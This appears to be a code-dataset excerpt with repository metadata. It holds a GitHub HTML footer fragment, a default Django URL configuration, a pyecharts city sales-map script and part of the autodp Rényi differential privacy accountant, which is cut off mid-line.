2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> <ul class="list-style-none d-flex flex-wrap col-12 col-lg-5 flex-justify-center flex-lg-justify-between mb-2 mb-lg-0"> <li class="mr-3 mr-lg-0"><a href="https://support.github.com?tags=dotcom-footer" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to contact&quot;,&quot;label&quot;:&quot;text:contact&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="ac4567556b973a5bf5d3c61161c07b927fab9772ddfb7e27055d611413f2acb4">Contact GitHub</a></li> <li class="mr-3 mr-lg-0"><a href="https://github.com/pricing" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Pricing&quot;,&quot;label&quot;:&quot;text:Pricing&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="894887d6dd70a306a70bc2b360c5fc5e23117412d10a4253ebae837147aeab59">Pricing</a></li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to api&quot;,&quot;label&quot;:&quot;text:api&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="78682afcd93486f1045fa60a8b86e5c164e42aa8441a136e07d508ea87437b6a">API</a></li> <li class="mr-3 mr-lg-0"><a href="https://services.github.com" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to training&quot;,&quot;label&quot;:&quot;text:training&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="7760f130353590dca4b2a6f009556a55c9558bb6cd58a07f3b606904080437a1">Training</a></li> <li class="mr-3 mr-lg-0"><a href="https://github.blog" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to blog&quot;,&quot;label&quot;:&quot;text:blog&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="bcabd5b32e60440ed8e25c81ce8fded52be950ccd0c53391aac6071ecf738b7c">Blog</a></li> <li><a data-ga-click="Footer, go to about, text:about" href="https://github.com/about">About</a></li> </ul> </div> <div class="d-flex flex-justify-center pb-6"> <span class="f6 color-text-tertiary"></span> </div> </div> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> <span class="js-stale-session-flash-signed-in" hidden>You signed in with another tab or window. <a href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-signed-out" hidden>You signed out in another tab or window. <a href="">Reload</a> to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-text-primary hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details> </template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div> </div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </clipboard-copy> </div> </template> <style> .user-mention[href$="/Bomzz06"] { color: var(--color-user-mention-fg); background-color: var(--color-user-mention-bg); border-radius: 2px; margin-left: -2px; margin-right: -2px; padding: 0 2px; } </style> </body> </html>
false
true
f705ba86509d02480a6aad1d5e160ac7369c37b3
748
py
Python
myblog/urls.py
kubruslihiga/djangotutorial
c13c5267761a4aaa422271b4220d8e724fccd37a
[ "Apache-2.0" ]
null
null
null
myblog/urls.py
kubruslihiga/djangotutorial
c13c5267761a4aaa422271b4220d8e724fccd37a
[ "Apache-2.0" ]
null
null
null
myblog/urls.py
kubruslihiga/djangotutorial
c13c5267761a4aaa422271b4220d8e724fccd37a
[ "Apache-2.0" ]
null
null
null
"""myblog URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.1/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path urlpatterns = [ path('admin/', admin.site.urls), ]
34
77
0.708556
from django.contrib import admin from django.urls import path urlpatterns = [ path('admin/', admin.site.urls), ]
true
true
f705bbab14c4d76328f030a10cda3c1c25aff596
63
py
Python
test.sh.py
MarcAntoineAlex/query-selector-1
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
[ "Apache-2.0" ]
null
null
null
test.sh.py
MarcAntoineAlex/query-selector-1
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
[ "Apache-2.0" ]
null
null
null
test.sh.py
MarcAntoineAlex/query-selector-1
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
[ "Apache-2.0" ]
null
null
null
a = [0, 1, 2] b = [0, 1] for a, b in zip(a, b): print(a, b)
15.75
22
0.412698
a = [0, 1, 2] b = [0, 1] for a, b in zip(a, b): print(a, b)
true
true
f705bbcb1c4c4102c9bcfce19fd7880e846a49e3
3,851
py
Python
python业务代码/地图散点可视化/2/plot_city_machine.py
RobinYaoWenbin/Python-CommonCode
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
[ "MIT" ]
12
2020-09-28T03:25:03.000Z
2022-03-20T07:44:09.000Z
python业务代码/地图散点可视化/2/plot_city_machine.py
RobinYaoWenbin/Python-CommonCode
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
[ "MIT" ]
null
null
null
python业务代码/地图散点可视化/2/plot_city_machine.py
RobinYaoWenbin/Python-CommonCode
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
[ "MIT" ]
21
2020-03-19T00:44:35.000Z
2022-01-30T03:46:18.000Z
# -*- coding: utf-8 -*- """ Created on Wed Aug 7 09:36:45 2019 @author: MyPC """ import pandas as pd import matplotlib.pyplot as plt import matplotlib import math import pymssql import numpy as np import copy import re from sklearn import preprocessing from sklearn.linear_model import LinearRegression from pyecharts import Map, Geo , Timeline def get_data_signalmachine(): df = pd.read_excel('Data.xlsx' , sheet_name='example') # df.fillna(0 , inplace = True) # df.set_index('year' , inplace = True) df.drop(columns = ['NO' , '首次售出年份' , '总计'] , inplace = True) df.rename(columns = {'行标签':'city'} , inplace = True) df.set_index('city' , inplace = True) df = df.T df.rename(columns = {'合计' : 'total'} , inplace = True) # print(df) return df def plot_map(df): # maptype='china' 只显示全国直辖市和省级 # 数据只能是省名和直辖市的名称 # province_distribution = {'青岛': 22, '龙口': 37.56, '河北': 21, '辽宁': 12, '江西': 6, '上海': 20, '安徽': 10, '江苏': 16, '湖南': 9, '浙江': 13, '海南': 2, '广东': 22, '湖北': 8, '黑龙江': 11, '澳门': 1, '陕西': 11, '四川': 7, '内蒙古': 3, '重庆': 3, '云南': 6, '贵州': 2, '吉林': 3, '山西': 12, '山东': 11, '福建': 4, '青海': 1, '舵主科技,质量保证': 1, '天津': 1, '其他': 1} # provice=list(province_distribution.keys()) # values=list(province_distribution.values()) years = list(df.index) geos = [] timeline = Timeline(width=1700,height=900,is_auto_play=True, timeline_bottom=-10,timeline_symbol_size=20,timeline_play_interval=400,timeline_left=20,timeline_right=100 , \ is_timeline_show = False ) for index in range(len(years)): cities = list(df.columns) cities.remove('total') values = list(df.loc[years[index] , :]) total_num = values[-1] del(values[-1]) # print(cities) # print(values) geos.append(Geo( str(int(total_num)), title_top="10%" , title_text_size=50 , subtitle = years[index] +" , subtitle", \ subtitle_text_size = 23 , subtitle_color="white", \ title_color="red", title_pos="center", width=1200, height=600, \ background_color='#404a59')) # type="effectScatter", is_random=True, effect_scale=5 使点具有发散性 geos[index].add("title level1", cities, values, type="effectScatter", maptype='china' , is_random=True, effect_scale=3, is_selected = True,is_toolbox_show = True ,is_more_utils =True,\ visual_text_color="#fff", symbol_size=10, is_label_show = True , legend_orient = 'left' ,is_legend_show = False, legend_top = 'bottom' , label_formatter = '{b}' , \ is_visualmap=True, is_roam=True , label_text_color="#00FF00" , is_piecewise=True, label_text_size = 7,visual_range=[1, 300] , \ geo_cities_coords = {'赣江': [115.934192 , 28.826235] , '红河州' : [103.381549,23.369996] , '蒙自' : [103.371546,23.40208] , '海安' : [120.469259,32.544553] , \ '济阳' : [117.023094,36.965519] , '库车' : [82.970183,41.733785] , '文山-砚山' : [104.334442,23.621612] , '文安':[116.455985,38.891083] , '罗平':[104.309188,24.890519] , \ '宣城' : [118.762662,30.957007] , '古田' : [118.747401,26.596702] , '泗阳':[118.699691,33.723524] , } , \ pieces=[ {"min":0.1, "max": 50 , "label": "0-50"}, {"min": 51, "max": 100 , "label": "51-100"}, {"min": 101, "max": 200 , "label": "101-200"}, {"min":201, "max": 500, "label": "201-500"}, {"min":500, "max": 2900, "label": ">500"}, ] ) geos[index].show_config() geos[index].render("xxxx售出数量.html") # 时间轴定义 timeline.add(geos[index],years[index] ) timeline.render('final_graph.html') def main(): df = get_data_signalmachine() # print(df) plot_map(df) if __name__ == "__main__": main()
47.54321
317
0.579849
import pandas as pd import matplotlib.pyplot as plt import matplotlib import math import pymssql import numpy as np import copy import re from sklearn import preprocessing from sklearn.linear_model import LinearRegression from pyecharts import Map, Geo , Timeline def get_data_signalmachine(): df = pd.read_excel('Data.xlsx' , sheet_name='example') df.drop(columns = ['NO' , '首次售出年份' , '总计'] , inplace = True) df.rename(columns = {'行标签':'city'} , inplace = True) df.set_index('city' , inplace = True) df = df.T df.rename(columns = {'合计' : 'total'} , inplace = True) return df def plot_map(df): years = list(df.index) geos = [] timeline = Timeline(width=1700,height=900,is_auto_play=True, timeline_bottom=-10,timeline_symbol_size=20,timeline_play_interval=400,timeline_left=20,timeline_right=100 , \ is_timeline_show = False ) for index in range(len(years)): cities = list(df.columns) cities.remove('total') values = list(df.loc[years[index] , :]) total_num = values[-1] del(values[-1]) geos.append(Geo( str(int(total_num)), title_top="10%" , title_text_size=50 , subtitle = years[index] +" , subtitle", \ subtitle_text_size = 23 , subtitle_color="white", \ title_color="red", title_pos="center", width=1200, height=600, \ background_color='#404a59')) geos[index].add("title level1", cities, values, type="effectScatter", maptype='china' , is_random=True, effect_scale=3, is_selected = True,is_toolbox_show = True ,is_more_utils =True,\ visual_text_color="#fff", symbol_size=10, is_label_show = True , legend_orient = 'left' ,is_legend_show = False, legend_top = 'bottom' , label_formatter = '{b}' , \ is_visualmap=True, is_roam=True , label_text_color="#00FF00" , is_piecewise=True, label_text_size = 7,visual_range=[1, 300] , \ geo_cities_coords = {'赣江': [115.934192 , 28.826235] , '红河州' : [103.381549,23.369996] , '蒙自' : [103.371546,23.40208] , '海安' : [120.469259,32.544553] , \ '济阳' : [117.023094,36.965519] , '库车' : [82.970183,41.733785] , '文山-砚山' : [104.334442,23.621612] , '文安':[116.455985,38.891083] , '罗平':[104.309188,24.890519] , \ '宣城' : [118.762662,30.957007] , '古田' : [118.747401,26.596702] , '泗阳':[118.699691,33.723524] , } , \ pieces=[ {"min":0.1, "max": 50 , "label": "0-50"}, {"min": 51, "max": 100 , "label": "51-100"}, {"min": 101, "max": 200 , "label": "101-200"}, {"min":201, "max": 500, "label": "201-500"}, {"min":500, "max": 2900, "label": ">500"}, ] ) geos[index].show_config() geos[index].render("xxxx售出数量.html") timeline.add(geos[index],years[index] ) timeline.render('final_graph.html') def main(): df = get_data_signalmachine() plot_map(df) if __name__ == "__main__": main()
true
true
f705bf3cfd5f5c6cac8ba32067f41aadcc0e38d6
34,521
py
Python
autodp/rdp_acct.py
jeremy43/autodp-1
0a3626f6e1baaefb46715396998d1e8029a659bb
[ "Apache-2.0" ]
2
2020-06-11T02:48:41.000Z
2020-11-17T07:04:01.000Z
autodp/rdp_acct.py
jeremy43/autodp-1
0a3626f6e1baaefb46715396998d1e8029a659bb
[ "Apache-2.0" ]
null
null
null
autodp/rdp_acct.py
jeremy43/autodp-1
0a3626f6e1baaefb46715396998d1e8029a659bb
[ "Apache-2.0" ]
null
null
null
""" This file contains the implementation of the main class object: anaRDPacct --- an analytical moment accountant that keeps track the effects of a hetereogeneous sequence of randomized algorithms using the RDP technique. In particular it supports amplification of RDP by subsampling without replacement and the amplification of RDP by poisson sampling, but unfortunately not (yet) together. """ import numpy as np from scipy.optimize import minimize_scalar import sys sys.path.append('..') import autodp from autodp import utils, rdp_bank from autodp.privacy_calibrator import subsample_epsdelta import scipy import math def general_upperbound(func, mm, prob): """ :param func: :param mm: alpha in RDP :param prob: sample probability :return: the upperbound in theorem 1 in 2019 ICML,could be applied for general case(including poisson distribution) k_approx = 100 k approximation is applied here """ def cgf(x): return (x - 1) * func(x) if np.isinf(func(mm)): return np.inf if mm == 1 or mm == 0: return 0 cur_k = np.minimum(50, mm - 1) # choose small k-approx for general upperbound (here is 50) in case of scipy-accuracy log_term_1 = mm * np.log(1 - prob) #logBin = utils.get_binom_coeffs(mm) log_term_2 = np.log(3) - func(mm) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm)) neg_term_3 = [np.log(scipy.special.comb(mm,l)) + np.log(3) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp((l - 1) * func(mm), cgf(l))[1] for l in range(3, cur_k + 1)] neg_term_4 = np.log(mm*(mm - 1)/2) + 2 * np.log(prob) + (mm - 2) * np.log( 1 - prob) + utils.stable_log_diff_exp(np.log(3) + func(mm), func(2))[1] neg_term_5 = np.log(2) + np.log(prob) + np.log(mm) + (mm - 1) * np.log(1 - prob) neg_term_6 = mm * np.log(1 - prob) + np.log(3) - func(mm) pos_term = utils.stable_logsumexp([log_term_1, log_term_2]) neg_term_3.append(neg_term_4) neg_term_3.append(neg_term_5) neg_term_3.append(neg_term_6) neg_term = utils.stable_logsumexp(neg_term_3) bound = utils.stable_log_diff_exp(pos_term, neg_term)[1] return bound def fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local): # evaulate the fast CGF bound for the subsampled mechanism # func evaluates the RDP of the base mechanism # mm is alpha. NOT lambda. return np.inf if np.isinf(func(mm)): return np.inf if mm == 1: return 0 secondterm = np.minimum(np.minimum((2) * np.log(np.exp(func(np.inf)) - 1) + np.minimum(func(2), np.log(4)), np.log(2) + func(2)), np.log(4) + 0.5 * deltas_local[int(2 * np.floor(2 / 2.0)) - 1] + 0.5 * deltas_local[int(2 * np.ceil(2 / 2.0)) - 1] ) + 2 * np.log(prob) + np.log(mm) + np.log(mm - 1) - np.log(2) if mm == 2: return utils.stable_logsumexp([0, secondterm]) # approximate the remaining terms using a geometric series logratio1 = np.log(prob) + np.log(mm) + func(mm) logratio2 = logratio1 + np.log(np.exp(func(np.inf)) - 1) logratio = np.minimum(logratio1, logratio2) if logratio1 > logratio2: coeff = 1 else: coeff = 2 if mm == 3: return utils.stable_logsumexp([0, secondterm, np.log(coeff) + 3 * logratio]) # Calculate the sum of the geometric series starting from the third term. This is a total of mm-2 terms. if logratio < 0: geometric_series_bound = np.log(coeff) + 3 * logratio - np.log(1 - np.exp(logratio)) \ + np.log(1 - np.exp((mm - 2) * logratio)) elif logratio > 0: geometric_series_bound = np.log(coeff) + 3 * logratio + (mm-2) * logratio - np.log(np.exp(logratio) - 1) else: geometric_series_bound = np.log(coeff) + np.log(mm - 2) # we will approximate using (1+h)^mm logh1 = np.log(prob) + func(mm - 1) logh2 = logh1 + np.log(np.exp(func(np.inf)) - 1) binomial_series_bound1 = np.log(2) + mm * utils.stable_logsumexp_two(0, logh1) binomial_series_bound2 = mm * utils.stable_logsumexp_two(0, logh2) tmpsign, binomial_series_bound1 \ = utils.stable_sum_signed(True, binomial_series_bound1, False, np.log(2) + utils.stable_logsumexp([0, logh1 + np.log(mm), 2 * logh1 + np.log(mm) + np.log(mm - 1) - np.log(2)])) tmpsign, binomial_series_bound2 \ = utils.stable_sum_signed(True, binomial_series_bound2, False, utils.stable_logsumexp([0, logh2 + np.log(mm), 2 * logh2 + np.log(mm) + np.log(mm - 1) - np.log(2)])) remainder = np.min([geometric_series_bound, binomial_series_bound1, binomial_series_bound2]) return utils.stable_logsumexp([0, secondterm, remainder]) def fast_poission_subsampled_cgf_upperbound(func, mm, prob): # evaulate the fast CGF bound for the subsampled mechanism # func evaluates the RDP of the base mechanism # mm is alpha. NOT lambda. if np.isinf(func(mm)): return np.inf if mm == 1: return 0 # Bound #1: log [ (1-\gamma + \gamma e^{func(mm)})^mm ] bound1 = mm * utils.stable_logsumexp_two(np.log(1-prob), np.log(prob) + func(mm)) # Bound #2: log [ (1-gamma)^alpha E [ 1 + gamma/(1-gamma) E[p/q]]^mm ] # log[ (1-gamma)^\alpha { 1 + alpha gamma / (1-gamma) + gamma^2 /(1-gamma)^2 * alpha(alpha-1) /2 e^eps(2)) # + alpha \choose 3 * gamma^3 / (1-gamma)^3 / e^(-2 eps(alpha)) * (1 + gamma /(1-gamma) e^{eps(alpha)}) ^ (alpha - 3) } # ] if mm >= 3: bound2 = utils.stable_logsumexp([mm * np.log(1-prob), (mm-1) * np.log(1-prob) + np.log(mm) + np.log(prob), (mm-2)*np.log(1-prob) + 2 * np.log(prob) + np.log(mm) + np.log(mm-1) + func(2), np.log(mm) + np.log(mm-1) + np.log(mm-2) - np.log(3*2) + 3 * np.log(prob) + (mm-3)*np.log(1-prob) + 2 * func(mm) + (mm-3) * utils.stable_logsumexp_two(0, np.log(prob) - np.log(1-prob) + func(mm))]) else: bound2 = bound1 #print('www={} func={} mm={}'.format(np.exp(func(mm))-1),func, mm) #print('bound1 ={} bound2 ={}'.format(bound1,bound2)) return np.minimum(bound1,bound2) def fast_k_subsample_upperbound(func, mm, prob, k): """ :param func: :param mm: :param prob: sample probability :param k: approximate term :return: k-term approximate upper bound in therorem 11 in ICML-19 """ def cgf(x): return (x - 1) * func(x) if np.isinf(func(mm)): return np.inf if mm == 1: return 0 #logBin = utils.get_binom_coeffs(mm) cur_k = np.minimum(k, mm - 1) if (2 * cur_k) >= mm: exact_term_1 = (mm - 1) * np.log(1 - prob) + np.log(mm * prob - prob + 1) exact_term_2 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + cgf(l) for l in range(2, mm + 1)] exact_term_2.append(exact_term_1) bound = utils.stable_logsumexp(exact_term_2) return bound s, mag1 = utils.stable_log_diff_exp(0, -func(mm - cur_k)) new_log_term_1 = np.log(1 - prob) * mm + mag1 new_log_term_2 = -func(mm - cur_k) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm - cur_k)) new_log_term_3 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp((l - 1) * func(mm - cur_k), cgf(l))[1] for l in range(2, cur_k + 1)] if len(new_log_term_3) > 0: new_log_term_3 = utils.stable_logsumexp(new_log_term_3) else: return utils.stable_logsumexp_two(new_log_term_1, new_log_term_2) new_log_term_4 = [np.log(scipy.special.comb(mm,mm-l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp(cgf(l), (l - 1) * func(mm - cur_k))[1] for l in range(mm - cur_k + 1, mm + 1)] new_log_term_4.append(new_log_term_1) new_log_term_4.append(new_log_term_2) new_log_term_4 = utils.stable_logsumexp(new_log_term_4) s, new_log_term_5 = utils.stable_log_diff_exp(new_log_term_4, new_log_term_3) new_bound = new_log_term_5 return new_bound class anaRDPacct: """A class that keeps track of the analytical expression of the RDP --- 1/(alpha-1)*CGF of the privacy loss R.V.""" def __init__(self, m=100, tol=0.1, m_max=500, m_lin_max=10000, approx = False, verbose=False): # m_max indicates the number that we calculate binomial coefficients exactly up to. # beyond that we use Stirling approximation. # ------ Class Attributes ----------- self.m = m # default number of binomial coefficients to precompute self.m_max = m_max # An upper bound of the quadratic dependence self.m_lin_max = m_lin_max # An upper bound of the linear dependence. self.verbose = verbose self.approx = approx self.lambs = np.linspace(1, self.m, self.m).astype(int) # Corresponds to \alpha = 2,3,4,5,.... for RDP self.alphas = np.linspace(1, self.m, self.m).astype(int) self.RDPs_int = np.zeros_like(self.alphas, float) self.n=0 self.RDPs = [] # analytical CGFs self.coeffs = [] self.RDP_inf = .0 # This is effectively for pure DP. self.logBinomC = utils.get_binom_coeffs(self.m + 1) # The logBinomC is only needed for subsampling mechanisms. self.idxhash = {} # save the index of previously used algorithms self.cache = {} # dictionary to save results from previously seen algorithms self.deltas_cache = {} # dictionary to save results of all discrete derivative path self.evalRDP = lambda x: 0 self.flag = True # a flag indicating whether evalCGF is out of date self.flag_subsample = False # a flag to indicate whether we need to expand the logBinomC. self.tol = tol # ---------- Methods ------------ def build_zeroth_oracle(self): self.evalRDP = lambda x: sum([c * item(x) for (c, item) in zip(self.coeffs, self.RDPs)]) def plot_rdp(self): if not self.flag: self.build_zeroth_oracle() self.flag = True import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') x = range(0,self.m,1) y = [self.evalRDP(item) for item in x] plt.loglog(x, y) plt.show() def plot_cgf_int(self): import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') plt.plot(self.alphas, self.RDPs_int) plt.xlabel(r'$\lambda$') plt.ylabel('CGF') plt.show() def plot_rdp_int(self): import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') plt.loglog(self.alphas, self.RDPs_int) if not self.flag: self.build_zeroth_oracle() self.flag = True x = range(1,self.m_lin_max,1) y = [self.evalRDP(item) for item in x] plt.loglog(x, y) plt.xlabel(r'$\alpha$') plt.ylabel(r'RDP $\epsilon$') plt.show() def get_rdp(self,alphas): # alphas is a numpy array or a list of numbers # we will return a numpy array of the corresponding RDP if not self.flag: self.build_zeroth_oracle() self.flag = True alphas = np.array(alphas) assert(np.all(alphas >= 1)) rdp_list = [] for alpha in alphas: rdp_list.append(self.evalRDP(alpha)) return np.array(rdp_list) def get_eps(self, delta): # minimize over \lambda if not self.flag: self.build_zeroth_oracle() self.flag = True if delta<0 or delta > 1: print("Error! delta is a probability and must be between 0 and 1") if delta == 0: return self.RDP_inf else: def fun(x): # the input the RDP's \alpha if x <= 1: return np.inf else: return np.log(1 / delta)/(x-1) + self.evalRDP(x) def fun_int(i): # the input is RDP's \alpha in integer if i <= 1 | i >= len(self.RDPs_int): return np.inf else: return np.log(1 / delta) / (i-1) + self.RDPs_int[i - 1] # When do we have computational constraints? # Only when we have subsampled items. # First check if the forward difference is positive at self.m, or if it is infinite while (self.m<self.m_max) and (not np.isposinf(fun(self.m))) and (fun_int(self.m-1)-fun_int(self.m-2) < 0): # If so, double m, expand logBimomC until the forward difference is positive if self.flag_subsample: # The following line is m^2 time. self.logBinomC = utils.get_binom_coeffs(self.m*2+1) # Update deltas_caches for key, val in self.deltas_cache.items(): if type(key) is tuple: func_tmp = key[0] else: func_tmp = key cgf = lambda x: x*func_tmp(x+1) deltas,signs_deltas = utils.get_forward_diffs(cgf,self.m*2) self.deltas_cache[key] = [deltas, signs_deltas] new_alphas = range(self.m + 1, self.m * 2 + 1, 1) self.alphas = np.concatenate((self.alphas, np.array(new_alphas))) # array of integers self.m = self.m * 2 mm = np.max(self.alphas) rdp_int_new = np.zeros_like(self.alphas, float) for key,val in self.cache.items(): idx = self.idxhash[key] rdp = self.RDPs[idx] newarray = np.zeros_like(self.alphas, float) for j in range(2,mm+1,1): newarray[j-1] = rdp(1.0*j) newarray[0]=newarray[1] coeff = self.coeffs[idx] rdp_int_new += newarray * coeff self.cache[key] = newarray self.RDPs_int = rdp_int_new # # update the integer CGF and the cache for each function # rdp_int_new = np.zeros_like(self.RDPs_int) # for key,val in self.cache.items(): # idx = self.idxhash[key] # rdp = self.RDPs[idx] # newarray = np.zeros_like(self.RDPs_int) # for j in range(self.m): # newarray[j] = rdp(1.0*(j+self.m+1)) # # coeff = self.coeffs[idx] # rdp_int_new += newarray * coeff # self.cache[key] = np.concatenate((val, newarray)) # # # update the corresponding quantities # self.RDPs_int = np.concatenate((self.RDPs_int, rdp_int_new)) #self.m = self.m*2 bestint = np.argmin(np.log(1 / delta)/(self.alphas[1:]-1) + self.RDPs_int[1:]) + 1 if bestint == self.m-1: if self.verbose: print('Warning: Reach quadratic upper bound: m_max.') # In this case, we matches the maximum qudaratic upper bound # Fix it by calling O(1) upper bounds and do logarithmic search cur = fun(bestint) while (not np.isposinf(cur)) and fun(bestint-1)-fun(bestint-2) < -1e-8: bestint = bestint*2 cur = fun(bestint) if bestint > self.m_lin_max and self.approx ==True: print('Warning: Reach linear upper bound: 